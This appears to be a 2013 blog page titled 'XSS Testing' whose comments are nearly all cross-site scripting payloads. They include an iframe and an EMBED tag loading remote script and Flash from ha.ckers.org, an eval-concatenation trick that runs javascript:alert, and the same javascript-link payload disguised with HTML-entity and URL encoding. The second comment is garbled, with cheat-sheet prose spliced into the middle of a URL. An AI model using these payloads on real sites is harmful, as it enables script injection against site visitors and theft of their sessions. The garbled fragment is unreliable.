Monday, 27 May 2013

XSS Testing


33 comments:

  1. <iframe src=http://ha.ckers.org/scriptlet.html <

    ReplyDelete
  2. EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
    org/xss.swf" AllowScriptAccess="always">

    ReplyDelete
  3. a="get";
    b="URL(\"";
    c="javascript:";
    d="alert('XSS');\")";
    eval(a+b+c+d);

    ReplyDelete
  4. &#60&#65&#32&#72&#82&#69&#70&#61&#34&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41&#34&#62&#108&#111&#108&#57&#60&#47&#65&#62

    ReplyDelete
  5. %3C%41%20%48%52%45%46%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%31%29%22%3E%6C%6F%6C%39%3C%2F%41%3E

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete

What's up 1337 ?

Give your Suggestion/ Feedback / Doubts /Open up a discussion.

-y0g1337h
"<script> </script>"